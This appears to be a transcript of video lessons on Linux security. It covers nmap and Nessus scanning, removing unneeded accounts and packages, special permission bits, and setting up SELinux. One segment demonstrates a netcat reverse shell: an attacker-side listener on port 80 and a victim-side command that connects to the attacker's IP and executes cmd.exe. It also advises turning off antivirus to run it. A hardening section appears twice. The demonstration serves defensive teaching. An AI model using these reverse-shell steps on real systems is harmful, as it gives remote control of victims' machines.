TCP port 3128. But if I use my up arrow key, we can also place multiple hosts, let's say by IP address, separated by a space. So when I press enter, it simply has two different output listings for each of those hosts. So if I just scroll up just a tiny bit here, so I've got the report here shown for one of the IP addresses I specified on the command line, and then the second host is shown here, of course, with a different listing of services that are up and running. Of course, you also get the MAC address shown here for that device, the hardware address assigned at the network card level, whether it's a virtual NIC or not. We could also run sudo nmap, let's say, against 192.168.2. If we wanted to scan all of the hosts on that network. Naturally, it's going to take longer to run that type of a scan than it would just on a smaller subset of hosts. Once that's completed, I can scroll back up through the output for all of the hosts that were discovered over the network that are responding to nmap port scans. We've got a lot of different things listening here, such as Apple file shares, even a telnet daemon. Ooh, that's not good. And that's one of the purposes of running a network scan is, of course, to discover what's up and running on the network. For example, here it looks like we've got a Roku TV device on the network. But if that's not allowed on the network and it wasn't there before, you might wonder, how did that happen? Why is that host on the network? Could be an employee that is doing something on the network, plugging it in. It could be an indication of some kind of network compromise. You might also do this to see what's running that shouldn't be. Why is the telnet daemon running on this host ending with .54? Telnet is notorious for not being a secure way to remotely manage hosts because it sends all of the transmissions over the network in clear text. It's just unacceptable in this day and age to be using something like that, even internally. Let's not forget that when you run these commands, if I use the up arrow key, remember, you can use output redirection to store that into a file, which you can then go through later or attach to an email message and send off to someone that might be interested in that. Now, there are many things I can do, such as sudo nmap. Maybe all I want to do is see which hosts are up on the network. So dash lowercase s, uppercase p. The man page is very helpful with this type of thing. And this time, again, I'll give it my 192.168.2.star parameter. All it's doing here is telling me what's up on the network, what is responding. So it's much quicker than doing the previous example where it was scanning also for open ports. Now, what if we want to scan for a specific port number? For example, we know that Telnet is nasty from a security perspective and really shouldn't be run. So I'm going to go ahead and run sudo nmap dash lowercase p for port number 23. Telnet normally listens on that port number, and I can scan my entire network here, 192.168.2.star. And what I'm looking for is a state of open. Naturally, we don't care if we've got a closed state for Telnet, but we definitely care about open machine. So we've got one host here that appears to have Telnet up and running, and we can see the IP address for that given host shown up above as well. The last thing we'll do here is run sudo nmap with the dash capital O. Now, a dash capital O means we want to do OS fingerprinting to try to determine what OS is running on that host. Let's say 192.168.2.156. Okay, let's see what it came up with, what it thinks. So it's determined the open port numbers, the MAC address. It's got a TCP/IP fingerprint, but it was unable to determine an exact OS match. So in some cases, it will be able to tell you if it thinks it's running a variation of Linux, depending on whether the device is firewalled or not and what is running on it. There are many tools out there that will allow you to assess host security, such as for Linux machines. And what I mean by that is not simply performing a port scan, but digging a little bit deeper to see if there are any vulnerabilities that might be exploitable without exploiting them on the host. So really, I'm talking about performing a vulnerability scan of a Linux host, where a penetration test would actively attempt to exploit those weaknesses. Here, we just want to identify them. Here, I've navigated in my browser to www.tenable.com, where you can download a trial version of Tenable Nessus, which is a network vulnerability scanner, which will scan the hosts that you tell it. You could specify a single host or an entire subnet. This is not the only tool out there that can do it. There are other tools like OpenVAS, VAS is spelled V-A-S, to name but just a few. Now, when you install this particular product, Nessus, it installs a tiny web server stack that you connect to with the web browser to further configure it. So I've already got this installed, and you'll notice here down below that you can get this installed on Linux by using the built-in Linux curl command. You can actually copy this command. There's a Docker container version of it, so if you've got the Docker engine installed, it says here you can run the Docker pull command. There are virtual machines. So there are a lot of ways to get this up and running. So here in my web browser, I've connected to my local host where I've got Nessus running. And in this case, I've got it running on Windows, but it really makes no difference what platform it's on. The web app behaves the same. Notice the default port number, 8834. So I'll specify the credentials that I can set when I get this installed. So the first thing I'm asked here is to specify the targets that I want to scan. In this particular example, I'm only going to scan a single Linux host, and its IP address is 192.168.2.156. So I'll go ahead and specify 192.168.2.156, and I'll click Submit. And then I'll choose Run Scan. So then I can select that host and choose Run Scan, and now it says Starting Scan. So it automatically used a policy called Basic Network Scan, and the status is showing as having been completed. So we have a start and date timestamp. Now, if we take a look here, it looks like we've only got one medium vulnerability. Now, we can even click on the Vulnerabilities tab here, where we can see if there are many other vulnerabilities. A lot of them are just informational. For example, there's an informational item here shown for web servers. If I click on it, it's showing me things like the Squid proxy is there running. But if I go to the mixed entry, here we go. We've got a medium DNS issue of some kind. So DNS server cache snooping, remote information disclosure. Of course, it says note, if this is an internal DNS server that's not accessible from the outside, it might not be a problem. But also at the same time, let's not forget that we also have to have the approach of assuming that we can have attacks from the inside.
Not necessarily from employees or contractors, but perhaps by an infected machine. So we can go to the All Scans view to see any past scans. But notice when we do that, we have a new scan button in the upper right. And because we're not using the initial pop-up screen to do a scan, look at the options we have. Host discovery. There's the basic network scan policy that was used, but we have an advanced scan, malware scan, even web application test scan if you're focusing on checking out if there are any vulnerabilities in web apps, ransomware scans. So there are plenty of types of scans that can be conducted here, even compliance with things like the PCI DSS security standard if you're dealing with cardholder information, such as for Visa cards or American Express cards. However, if I click settings at the top, let's not forget here, if I go to software update, we need to make sure that our vulnerability scanning database, things we're looking for, is up to date here. So you want to make sure that updates are enabled here. You can control the frequency if you really want to. This is important because when you are running your scans, it's only coded to look for what it knows about. Let's go back to scans here. New scan. Let's do an advanced scan. Now, when you do this, you can give it a name. I'm going to call it Deep Scan 1. It'll go into the My Scans folder, but I'm only going to tell it to scan that one host again, 192.168.2.156. You can also schedule this. There's a scheduling button. You can also specify credentials for the individual host. Now that's interesting because then it will really be able to do an in-depth analysis of the machine. Now you might wonder, why would I want that? I want to see what attackers can see. Well, that's true too, but what if there's some kind of an internal attack? Maybe the machine has been compromised, it's infected. Sometimes you'll want to see what kind of a vulnerability list you get from that perspective. So maybe I'll click SSH here and just specify password authentication with a username. And I'll specify the password here, and I'll tell it to escalate or elevate privileges using sudo. The default here is to escalate to root, and I'll put in the sudo password, which is for my user account, of course. C Blackwell. I can also check for compliance by going to the Compliance tab with a number of security standards. And under Plugins, I'll get a sense of what it is it's going to check. I'm okay with all of this, so I'm going to go ahead and choose Save. There's Deep Scan 1, so I can select it, and I can click the Launch button over to the far right. Notice that now Deep Scan 1 shows up at the top of the list, and it's currently running. I can click on it to see what it's doing. So you can't really discuss security without discussing vulnerability scanning. This is not a one-time effort. This needs to be periodic, recurring. And that frequency will really depend on your organizational security policies, but it's important to know what our security posture is by running these scans on a frequent basis. One aspect of hardening Linux hosts is making sure you're only running what is absolutely necessary, because this way you would be reducing the attack surface. When you reduce the attack surface, it means there's less that potentially could serve as an attack vector for malicious actors. So we're going to take a look at some things to consider disabling or removing from a Linux host. Now, the first thing to bear in mind is that if you were to run sudo tail/etc/password, we'll just look at the last couple of entries of that file, having a sense of whether all of these user accounts are actually required or not. Because what you could then do is run sudo last. This will give us a list of user accounts shown in the leftmost column. The terminal they signed in from, if they've ever signed in, like pts/0, is sudo terminal 0. That's a remote connection, normally through SSH. We have the IP address shown here, and we've got the date and timestamp with a duration. Naturally, this is going to be important to see who's been logging in and when. As we scroll back up through the list, we see that most of the activity in this case is for user C Blackwell. So we know that that's a valid account that we would not want to remove. In the same way, we might run sudo who to see who is currently logged in. Here I've got my C Blackwell account shown here with numerous sudo terminals, as well as locally on the server terminal itself, which is showing up here as TTY1. So notice the lack of an IP address there. So we know it's an active account. I could also run sudo last log. This one's interesting because it'll show all of the accounts, including the system or daemon accounts, and whether or not they've ever been used to log in, which can be eye-opening. So part of hardening Linux would be to determine which user accounts really don't need to be there. Maybe they can be disabled or entirely removed. And a user account would be considered a part of the operating system in terms of components. For example, if I were to run sudo password, as in passwd, I could use -l to lock an account, such as mbishop. So that user account cannot be used to sign in. Of course, we could run the same command except change the -l to u for unlock. Or of course, we could run sudo userdel and simply specify the user account we want removed. The other thing that's very important is to determine which software packages are installed. Of course, this is going to be a prime thing to focus on when you're thinking about what to remove or disable. If I run sudo apt list and just press enter, and that command will vary depending on the distribution of Linux you're using. But here in Ubuntu, which is Debian-based, we can use the apt command set. Anyways, here I've got a list of all of the software packages installed and, of course, their versions. Now, that's quite the output. So, of course, we could pipe that command to grep and look for something very specific, let's say Python. So then we have all of the Python-specific components that are installed shown along with their versions. Of course, we can also run sudo ps -aux to see all running processes, even those not tied to this user terminal. We'll see the command that was used to spawn it shown over on the right. So sometimes you might see things that are running and you might wonder, do I need that component to be running in the background? And that can help you determine which components you might remove. For example, sudo apt remove Apache 2. So if the Apache web server is there, it'll ask me if I want to continue removing it. I'm going to type in the letter Y for yes. So not only am I freeing up disk space, but I'm removing a component that, if we know it is not needed, then we are then reducing the attack surface. Having a web server running when you don't need it running is definitely a security no-no. The other aspect to consider is on Linux client devices if you have them. Here I've got Ubuntu desktop running, so in the same way, we need to be able to find out what is installed and whether or not it really needs to be installed. In the same way, we should also consider our Linux client machines if we have any out on the network under our control. Ideally, they will be centrally managed by some kind of a configuration management tool, which determines how they get updated, what software is allowed to be installed on them, and whatnot. However, here in Ubuntu desktop, I'm going to start by opening up my menu, and I'm going to search for the word software, and I'm going to choose Ubuntu software. This is kind of like a modern app store you would find on any type of device, but what I'm primarily interested in are two things. One is clicking installed at the top. Here we've got all of the software installed on this machine showing up, and we have the option of uninstalling it. In this case, because this is a user client environment, we have a lot of client software like the Firefox web browser, the gedit graphical editor, the GNOME calculator, and so on. But it's pretty easy to simply do an uninstallation on this given host. The other thing we always have to consider are the updates. If there are updates available, then they will be shown here and we can choose to update. But again, we're doing this manually on a single Linux host. In a larger environment, you need to have a solution where you can do this centrally. Whether you're using products like Puppet or Chef or Ansible, or in the cloud, if you're using, for instance, Amazon Web Services, you can have all of your virtual machines registered centrally so you can list software installed on them. You can deploy scripts to run on a schedule from a centralized location. You can apply updates centrally. So while it's important to know how to do this on a single host, think about how scalable that will be in a larger environment. Reverse shells have long been a tool used by malicious actors. The nature of a reverse shell is that on the attacker's machine, they will set up a listener, maybe on port 80. And then what they'll do is infect victim client machines that will make a connection to the listener on the attacker's machine and present a command prompt, which actually stems from the victim's computer, but it shows up on the attacker machine. And if the attacker is setting up a listening connection on a standard port like 80, on the victim's network and from their computer's perspective, it just looks like outgoing port 80 traffic, which doesn't look suspicious, at least not normally. If you have a threat hunting tool installed, it might detect strange port 80 traffic going to some unknown hostname or IP address. But at any rate, we're going to take a look at how to set this up. Because in knowing this, we can perhaps set security policies in motion to mitigate this kind of a problem. So here, I've navigated in my browser to eternallyboard.org/misc/netcat. We're going to use the netcat tool to set up this reverse shell. So I've already downloaded and unzipped netcat, the latest version. Now you might have to temporarily turn off real-time virus protection on your machine if you have it installed, because it will detect this as some kind of a Trojan. But where we have control of it in this testing environment, it's okay. Whenever you temporarily turn off your real-time protection, first of all, make sure that's in line with your organizational security policies and it's not a production machine. And secondly, make sure you turn it back on, even if it's a testing station. Now on Linux, you won't have to download or install anything. I've got that downloaded and unzipped on a Windows computer. Realistically, the attacker would somehow trick the Windows user into perhaps clicking a link in an email message or downloading a file attachment, standard social engineering phishing type of stuff. But the attacker has to have a listener running on their station. So the way we'll do that, and we'll assume this Linux host we are looking at is our attacker station. This is where the attacker sits. So sudo nc for netcat, -l for listen, v verbose, and p for port. Why don't we just listen on port 80? You can choose any port number, and that's it. It says listening on 0.0.0.0, which really just means all IPs on this host, and then port 80. What is it listening for? It's listening for victim-infected computers to make a connection out to this attacker machine. Think about that now, because most firewall configurations are focused on traffic initiated from public networks like the internet coming in. That won't be the case here, because the traffic will show as being initiated from inside the network, from the infected computer's perspective. It'll come out to the attacker station. Interesting. So that can defeat some basic firewall configurations, packet filtering firewalls, depending on how they're set up, or NAT configurations. Now here on the Windows computer, which we're calling the victim or the infected machine, we are manually running netcat, but again, the attacker would deploy a campaign that would somehow trick users into having this type of command executed behind the scenes. What's the command? Well, I'm in PowerShell, so even though I'm in the same subdirectory where the executable is, which is called nc64.exe, PowerShell I'll still put in / because this path is not in my path variable. So / nc64 space, the IP address of the attacker's system, where it's listening on port 80, -e for execute. Well, what do we want to execute? And this would be something we're executing locally here on the victim's Windows computer. And we want to present it to the attacker station. I want to run a command prompt, cmd.exe. That's how you load a command prompt on the Windows machine. However, the cool thing about this is it's going to show up as a Windows command prompt on the attacker station. Let's see if that's true. Let's press enter. Okay, so all we get is a blinking command prompt. It has made the connection over the network. And so on the network, it will look like port 80 traffic, so standard HTTP web traffic, leaving this victim's computer going out somewhere on the internet. Here we are back on our Linux machine. What do we have here? We have a Microsoft Windows command prompt. But wait a minute, this is Linux. Yes, but whatever's happening with cmd.exe, so we've spawned an instance of that Windows side and presented it here. I have the whole subdirectory path. I can issue Windows commands, dir, change directory to the root of the Windows file system. Now I'm viewing everything on that Windows machine. So I've got a reverse shell. I can execute programs on that machine. I can work with files on that machine. And if I were to run Notepad here from Linux, well, that's not going to run on the Linux machine. This is a remote reverse shell. What we type in here happens on the infected machine. In other words, I'll be running Notepad on the machine. Let's see if that's true. I'll press enter. So here in Linux, it just returns Notepad, so it launched successfully. And on the target Windows computer, sure enough, Notepad is now showing as being up and running. Think about the power that the attacker has in this type of a situation. This is one of the many reasons we should have an up-to-date virus scanner on machines, have an active threat hunting tool that looks for potentially suspicious activity, such as port 80 traffic going to some random IP. That's not normal, especially if it happens in the middle of the night without a user being signed in. So all of these things we have to consider when it comes to securing our Linux hosts. One aspect of hardening Linux hosts is making sure you're only running what is absolutely necessary, because this way you would be reducing the attack surface. When you reduce the attack surface, it means there's less that potentially could serve as an attack vector for malicious actors. So we're going to take a look at some things to consider disabling or removing from a Linux host. Now, the first thing to bear in mind is that if you were to run sudo tail /etc/password, we'll just look at the last couple of entries of that file, having a sense of whether all of these user accounts are actually required or not. Because what you could then do is run sudo last. This will give us a list of user accounts shown in the leftmost column. The terminal they signed in from, if they've ever signed in, like pts/0, is sudo terminal 0. That's a remote connection, normally through SSH. We have the IP address shown here, and we've got the date and timestamp with a duration. Naturally, this is going to be important to see who's been logging in and when. As we scroll back up through the list, we see that most of the activity in this case is for user C. Blackwell. So we know that that's a valid account that we would not want to remove. In the same way, we might run sudo who to see who is currently logged in. Here I've got my C Blackwell account shown here with numerous sudo terminals, as well as locally on the server terminal itself, which is showing up here as TTY1. So notice the lack of an IP address there. So we know it's an active account. I could also run sudo last log. This one's interesting because it'll show all of the accounts, including the system or daemon accounts, and whether or not they've ever been used to log in, which can be eye-opening. So part of hardening Linux would be to determine which user accounts really don't need to be there. Maybe they can be disabled or entirely removed. And a user account would be considered a part of the operating system in terms of components. For example, if I were to run sudo password, as in passwd, I could use -l to lock an account, such as mbishop. So that user account cannot be used to sign in. Of course, we could run the same command except change the -l to u for unlock. Or of course, we could run sudo userdel and simply specify the user account we want removed. The other thing that's very important is to determine which software packages are installed. Of course, this is going to be a prime thing to focus on when you're thinking about what to remove or disable. If I run sudo apt list and just press enter, and that command will vary depending on the distribution of Linux you're using. But here in Ubuntu, which is Debian-based, we can use the apt command set. Anyways, here I've got a list of all of the software packages installed and, of course, their versions. Now, that's quite the output. So, of course, we could pipe that command to grep and look for something very specific, let's say Python. So then we have all of the Python-specific components that are installed shown along with their versions. Of course, we can also run sudo ps -aux to see all running processes, even those not tied to this user terminal. We'll see the command that was used to spawn it shown over on the right. So sometimes you might see things that are running and you might wonder, do I need that component to be running in the background? And that can help you determine which components you might remove. For example, sudo apt remove Apache 2. So if the Apache web server is there, it'll ask me if I want to continue removing it. I'm going to type in the letter Y for yes. So not only am I freeing up disk space, but I'm removing a component that, if we know it is not needed, then we are then reducing the attack surface. Having a web server running when you don't need it running is definitely a security no-no. The other aspect to consider is on Linux client devices if you have them. Here I've got Ubuntu desktop running, so in the same way, we need to be able to find out what is installed and whether or not it really needs to be installed. In the same way, we should also consider our Linux client machines if we have any out on the network under our control. Ideally, they will be centrally managed by some kind of a configuration management tool, which determines how they get updated, what software is allowed to be installed on them, and whatnot. However, here in Ubuntu desktop, I'm going to start by opening up my menu, and I'm going to search for the word software, and I'm going to choose Ubuntu software. This is kind of like a modern app store you would find on any type of device, but what I'm primarily interested in are two things. One is clicking installed at the top. Here we've got all of the software installed on this machine showing up, and we have the option of uninstalling it. In this case, because this is a user client environment, we have a lot of client software like the Firefox web browser, the gedit graphical editor, the GNOME calculator, and so on. But it's pretty easy to simply do an uninstallation on this given host. The other thing we always have to consider are the updates. If there are updates available, then they will be shown here and we can choose to update. But again, we're doing this manually on a single Linux host. In a larger environment, you need to have a solution where you can do this centrally. Whether you're using products like Puppet or Chef or Ansible, or in the cloud, if you're using, for instance, Amazon Web Services, you can have all of your virtual machines registered centrally so you can list software installed on them. You can deploy scripts to run on a schedule from a centralized location. You can apply updates centrally. So while it's important to know how to do this on a single host, think about how scalable that will be in a larger environment. In this demonstration, I will be managing advanced file system permissions. Now, what do I mean when I say advanced? We're talking about things like the sticky bit, the group ID bit, the user ID bit. Let's talk about what this means. We'll start with the sticky bit. So the purpose here of the sticky bit is to ensure only that file owners can delete their own files in a shared directory. They can't delete other people's files regardless of permissions that are assigned. So as an example, let's go to the root here on our Linux host. I'll run sudo make dir, let's call it shared_files. If I do an ls-ld of shared files, Now I added the dash lowercase d. I don't want to show what's in that directory. I want to show the directory entry itself. Notice the permissions. It's a D for directory, read, write, execute for the owning user, read and execute for the owning group, and read and execute for everybody else. Okay, that's fine. I want to make sure that users can only delete their own files in this location. Well, the first thing I would do here is sudo change mode. Let's say for everybody else, that's O, I will add the W permission. So O plus W. And of course, we'll add the subdirectory name at the end there. If we do an LSLD, notice now everyone has read, write, and execute permissions. Okay. But again, I only want users to be able to delete their own files. So we're going to set the sticky bit. To do that, I can run sudo chmod, change mode, plus T, that's what we use for the sticky bit, and then the name of the directory. Now if I do an LSLD, notice that instead of having RWX for everyone, in the position of execute, the lowercase t represents that the sticky bit has been set for that directory. Think of these special advanced security permissions kind of to be retrofitted into the existing placeholder system for Linux file system permissions. Now let's say we do an sudo change mode O for other minus X. I want to remove the execute permission, and that's for the shared _files directory. Now when we do an ls-ld, notice that the T for the sticky bit shows as capital. Capital implies that there's nothing else that's supposed to be there, hence capital T. There's no execute permission set for other. Now that's the sticky bit. There are two other special permission bits we need to be aware of. Let's talk about the user ID bit. So the special user ID bit is often called SUID. Let's create a sample script. sudo touch. Let's change directory into shared files. However, I'm going to run sudo change mode O plus X. I'm going to add the execute permission back to the shared folders directory. To change directory into a directory, users will need read and execute. So change directory into that location. I'm going to run sudo touch script1.sh. Okay. And I'll do an LL. So let's say this is an active script that does something. What we can do is flag a file so it runs as whoever is listed as the owner, as opposed to running with the permissions of whoever invokes it. That's the special ID bit, the SUID bit. Where the sticky bit permission shows up in the other placeholder section, the SUID bit, if set, shows up in the owner permission section. Let's see what that means. sudo chmod u, because it's in the user position, plus S, and that's going to be for script1.sh. If I do an LL, it's highlighted in red, but notice we have a capital S in where you would normally expect the execute permission to show for the owning user. It's a capital S because execute's not been set. If we set execute, so sudo chmod u for owning user plus X for script1sh. Now when we do an LL, notice that it's been reduced from a capital S to a lowercase s. So now whoever executes this script, it will run as the owning user. So whatever the script does will run as root while it's running. You can also do the same type of thing for the owning group of a file. For example, if I do an sudo tail of /etc/group, we've got a group defined on the system called east admins. Let's use that as our example. Okay, so let's run sudo chgrp change group to east admins for script1.sh, and we'll do an LL. As you might expect, the owning group is now shown as east admins. We know that with the special user ID bit, the SUID bit, it allows whoever invokes a binary or a script, it runs with the owner. Well, we can do the same type of thing, but have it run as the group. So with the permissions of the owning group. To do that, we would run sudo change mode chmod g for group plus S, in this case for script1sh. Let's do an LL. Notice we get a capital S in the group permission section, capital S because there is no execute permission for the group. Now, it's also important to understand the numeric values. The suser ID bit has a value of 4, the group ID bit has a value of 2, and the sticky bit has a value of 1. I'm just typing this in, it's not a command, just to demonstrate. So why is that relevant? Well, because you might see it sometimes when permissions are being set, or the UMask is being set. For example, imagine this. sudo chmod 1660 script1sh. What does that mean? Well, the 1 is for the special permission bit. And we know that the sticky bit has a value of 1. Everything else is regular file system permission. 6 means read and write 4 plus 2 for the owning user. The next 6 is read and write 4 plus 2 for the owning group. And 0 means no permissions for everyone else. Let's see if that's true. Let's do an LL. Looks about right. There's 6, read write, 6, read write, and then 0, no permissions for everyone else, but the sticky bit has been set, which stems from the 1. So just be aware of those numeric representations as well. In this demonstration, I will be enabling SELinux on Ubuntu Linux. SELinux, of course, as we know, stands for Security Enhanced Linux. It is a mechanism by which the operating system is a mandatory access control type of authorization solution where things get labeled, things like files, other resources like network sockets and services, they get flagged in a certain way, in a certain context, to determine what access is granted to users or devices. Now, with some Linux distributions, SELinux is automatically enabled. With others, it's available, but it's not set to enforce. And yet with, again, other Linux distributions, you're going to have to go ahead and install it. In the case of Ubuntu Linux, the first thing I'll have to do is run sudo service AppArmor stop. The reason for this is because AppArmor is yet another type of security solution similar in a loosely conceptual way to SELinux. However, we're going to go ahead and stop that, and we're going to disable it. So I'm going to run sudo systemctl disable AppArmor. Okay, now we can start to think about SELinux. What we're going to have to do here in Ubuntu is we're going to have to start by installing some packages. So sudo apt update. Let's make sure our package repositories and the software available on them is up to date. After which time we can run sudo apt install policy core utils, SELinux-utils, and SELinux-basics. Okay, so these are the packages I'm going to need to effectively work with SELinux on this host. So I'm going to go ahead and press enter, and when prompted, I'll type in the letter Y for yes to continue the installation. Once that's done, I can run commands like sudo se status. What's the status of Security Enhanced Linux? Well, currently it's disabled, which makes sense, of course, because all we've done is installed it. We haven't turned anything on. In the same way, if I run sudo get enforce, it returns disabled. If I were to run sudo cat /etc/SELinux/config, we'll pipe that to more. This is a config file, of course, as you might guess, for controlling the behavior of SELinux. Notice here, SELinux is set to permissive, and of course, our description above states that permissive means that SELinux is monitoring and prints warnings, but it doesn't enforce any types of restrictions. Of course, we could change that, but we can also change the state of SELinux. Now, you would think that we'd be able to run sudo set enforce --1 to turn on enforcement mode. However, it says, well, that's great, I'd like to do it, but SELinux is disabled. Therefore, we're going to have to first run sudo SELinux-activate. At the bottom, it says SELinux is activated. You may need to reboot now. It added a boot menu entry. Perfect. So now if I were to run sudo se status, it still says disabled. If I were to run sudo get enforce, it still says disabled. So you always need to make sure that you are rebooting when you make this kind of a change. I'm going to do that by running sudo init 6 to enter run level 6, which means to reboot the host. Okay, so now that I've rebooted and signed back in, why don't we run sudo se status once again? And notice, of course, now it shows that SELinux has a status of enabled. We've got a file system mount at /sys/fs/SELinux. It's got the default SELinux policy loaded. The current mode we are running in is permissive. However, now that we're in this state where we've activated SELinux and rebooted, if we were to run sudo set enforce 1, we don't get a message this time that says SELinux is disabled. So why don't we go ahead and run sudo get enforce. It now says enforcing. If I were to run sudo cat /etc/SELinux/config, pipe it to more. Remember that file we looked at before? So if we want to make sure that we have SELinux running in enforcing mode all the time, we can go ahead and make that change here with the SELinux equals directive. And of course, we would reboot. But I must warn you, don't set SELinux to enforcing yet. We've got a couple of other videos where we'll take a look at how to properly configure SELinux. If you don't set it up correctly with the user mapping between Linux and SELinux, and if you don't set the contexts correctly, such as for the file system and for running processes, you could end up locking yourself out of your system, such as being unable to SSH into your server, while local logins would work at the server itself. But at this point, we have a general sense of at least how to get SELinux up and running
on Ubuntu Linux. In this demonstration, we'll take a look at some basic SELinux configuration. SELinux is an enormous topic that is a course unto itself, but here we'll just poke around a little bit with the config file and viewing things like contexts with a focus on file contexts. Let's start by running sudo nano, and let's take a look at the /etc/SELinux/config file. Notice currently SELinux is set for permissive mode. Essentially, this means it will be monitoring for SELinux security issues, but it will not enforce it. So we could change that value in that config file to enforcing and reboot to enter enforcing mode, or we could do it temporarily here at the command line. First things first, let's run sudo get enforce. And what it should return is permissive. But what we can do is run sudo set enforce and give it a value of 1 to turn on enforcing mode. When we do that and then check get enforce, it now returns that we are in enforcing mode. Now you want to be careful with this. What I mean by that is you want to make sure, for instance, that you've mapped Linux users to SELinux users to allow things like SSH remote logins to work once you are in enforcing mode. We'll focus on how to work with SELinux user mappings and whatnot in another video. As an example, if I were to try to open up a new SSH session for user C Blackwell, and I'm just using the PuTTY tool to do that remotely, it prompts me for my password. Well, that means the SSH daemon is working server-side, so there's no SELinux issues with that. But despite the fact that I entered in the credentials correctly, it did not let me into that session. And that's because there's not been a user mapping yet between SELinux and that regular Linux user. Again, we'll do that in another demo, but it's important to understand. So I'm going to run sudo set enforce 0 to go back to permissive mode. If we take a look at that with get enforce, we're back in permissive mode. Let's talk about context. When I type ID-Z, for my current login user, it'll return information about my user as related to SELinux, my role with an _R, and type _T. Currently, it's all just unconfined. And then I've got permissions levels. Well, we can also view the same type of information for running processes. Let's say I run ps-aux, which we would normally do to view all running processes, even those not tied to this user terminal or any terminal, and add a Z to it. So now we are getting all of these different types of users, roles, and file types, or just types, for each running process. So let's do that again, except let's pipe the results to the grep line filtering tool looking for the word Apache. So we've got a number of instances here, but what's important is noticing that now we don't have unconfined listings. We've got system_user, system_role. Of course, those are abbreviated. And for the type, we have httpd_t. Interestingly, if I were to change directory to var/www/html, which is the default website directory, let's say we did an ls-Z. Notice the index.html file, which is the default web page served up by Apache, has a file system type set to httpd_sys_content_t. These types are used to correlate things like files with processes to determine if processes are allowed to read or to write files. As an example, let's say I wanted to have a website directory on the root here called site1. And why don't we also run sudo touch to create a file in there, let's say called index.html. If we go into site1 and if we do an ls-Z, notice that the type here is not set correctly for the Apache web server to be able to access this file. Of course, you could reconfigure your web server to point to this directory as the web root. But what we can do here is run sudo chcon for change context. So I could do even this, -r for recursive, -t for type, and I want this, let's say, to be set to httpd_sys_content_t, that's the type. I want that applicable in the current directory. Now, if I run ls-Z once again, notice that the type has been successfully changed, which means that the Apache process then would have access to work with this file. So you can use the ls-Z command to check the context of any location. Here I've done it for /etc/ssh. And here I've got the types shown as etc_t. So the -Z then is the common thread to view context for the ID command, the PS command, and the LS command. In this demonstration, I will be managing SELinux users. So the way that it works with SELinux is that regular user accounts in Linux get mapped to SELinux users, and then, of course, we'll be able to access resources that might otherwise be restricted by SELinux. Let's start here by running get enforce. So here it's showing that we are in permissive mode, so we are not enforcing SELinux policies. Now I currently have an SSH session. I'm already logged in as user C Blackwell. Let's try to open up another SSH session for that same user, just to see if it works or not. Because remember, if we do run sudo se status, SELinux is enabled. It's just we're running in permissive mode. Okay, so I'm going to log in here in this second session as user C Blackwell. This is happening over SSH. And we're in, and everything is great. Okay, let's exit out of that. Now what I'd like to do is I'd like to run sudo set enforce 1. And what that means is we are now running in enforcing mode. Okay, so naturally my current session is still valid. I can still type things in here and it's active. But let's start a new SSH session once again for user C Blackwell. Okay, C Blackwell, put in the password, and it just kicked me right out. It failed. Well, the reason for that is that C Blackwell has not yet been mapped to an SELinux user. And so, of course, everything is denied in that sense. So let's run sudo se manage user-l. This is going to show me SELinux users. So notice, for example, the built-in staff SELinux user account. It's called staff_u. Notice the MLS level is set to S0, which is considered the least sensitive of the multiple levels that you can assign. We won't be going into detail with that, but what we will be doing is mapping user C Blackwell to staff_u. Before we do that, let's see if that's already been done. sudo se manage. This time we're going to put in the word login as opposed to user. Okay, so it looks like I've got the root Linux account mapped to the unconfined_u in SELinux, but there's no listing here for C Blackwell. So we're going to do that. I'm going to run sudo se manage login-a. I want to add a mapping between the Linux user and an SELinux user. If you want to delete them, you could use --delete, but here we'll use -a to add, and -s, and the user is staff_u. We just looked at that. That's the SELinux user, and I want that mapped to the Linux user called C Blackwell. Enter. So now if we use our up arrow key to go back to sudo se manage login-l, notice C Blackwell is now shown being mapped to staff_u. Now if we run sudo get enforce, you might recall that we are currently in enforcing mode. Previously, C Blackwell could not start a new remote SSH session. And the reason was because it wasn't mapped to an SELinux user that could do stuff. Now, that has been changed. Let's try it. Okay, once again, we are trying to SSH into our host with the username C Blackwell, put in the password, and this time we are in. Again, if we run sudo get enforce, we're not in permissive mode here. We are in enforcing mode. So when you work with SELinux, it's always important to understand contexts, the various modes of SELinux, and also how to map SELinux users to regular Linux users. So the last thing I'm going to do is I'm going to remove user C Blackwell from being mapped to that SELinux account. We can do that here with sudo se manage login --delete in lowercase letters --s, and the SELinux account was called staff_u, and the local Linux account was called C Blackwell. So we're going to go ahead and type that in and press enter. Okay, so now if we check our work, we can run sudo se manage login -l. Notice that C Blackwell is no longer there. Remember, we can run sudo se manage user-l to view just the SELinux users. And one thing to think about is that the unconfined_user has much less restrictions placed on it than, for instance, the staff_u account would. In this demo, we're going to take a peek at how you can manage a process and the files that it needs access to when SELinux is in enforcing mode. So let's examine this a little bit. The first thing that we're going to do is we're going to run ps-aux, which normally shows us all running processes, even those not tied to our user session or any user terminal. But we're going to add the capital Z. You might recall, the capital Z is a parameter for a number of commands that will show you context information for whatever it is the root command is doing, which in this case is ps, showing us processes. I'm going to pipe that to grep. We're looking for Apache 2. Now, the reason we're very interested here is because notice that the Apache 2 process is set to a type of HTTPD_T. What that means is that process will be able to talk to anything, such as in the file system, that's flagged with the content type that starts with HTTPD, has something else, and then ends with T. That's the link. So if, for example, we were to do an ls-Z/usr/sbin, why don't we look at the binary that actually starts the Apache web server daemon? So there it is. It's the Apache 2 file. And notice its type here is set to httpd_exec_t. Well, you might say, well, that one has exec in it, and the process doesn't have exec. That's okay, as long as it's httpd something t. In the same way, if we were to do an ls-Z of /var/www/html, the default document root for the Apache web server, the default sample web page index.html is set to httpd_sys_content_t. So therefore, the web server can serve that stuff up. Okay, well, let's verify that that's correct. If I run get enforce, we are in permissive mode. Let's switch that right now. sudo set enforce 1, and let's run get enforce again. Okay, now we're in enforcing mode, and if we run sudo service apache 2 status, it's active and running. So let's see if we can pull up the default web page. For that, we'll need our IP, so IP space A. Here it is, 192.168.2.56. Let's hit that in a web browser. Okay, so we get the standard Apache 2 default web page. The default listening port is 80. Everything looks fine. Okay, so back here in Linux, let's run sudo make dir, and on the root, I'm going to make a directory called my site. If I change directory into my site, in here I can create an HTML file. So I'll run sudo nano index.html. And we'll just put in some very basic HTML using tags. The page basically is going to say sample web page. Okay, let's go out and let's save that file. Let's go ahead and run sudo nano /etc/apache2/sites-enabled, and I'm going to refer to my config file in there to open it up. Within that config file, I want to make sure that I've changed the document root to reflect our new location, which in this case is just /mysite. So that's been done. The virtual host is set to listen on port 80. All is good. Let's get out of there. And I'm going to run sudo service apache 2 restart, so it picks up the change. I'll 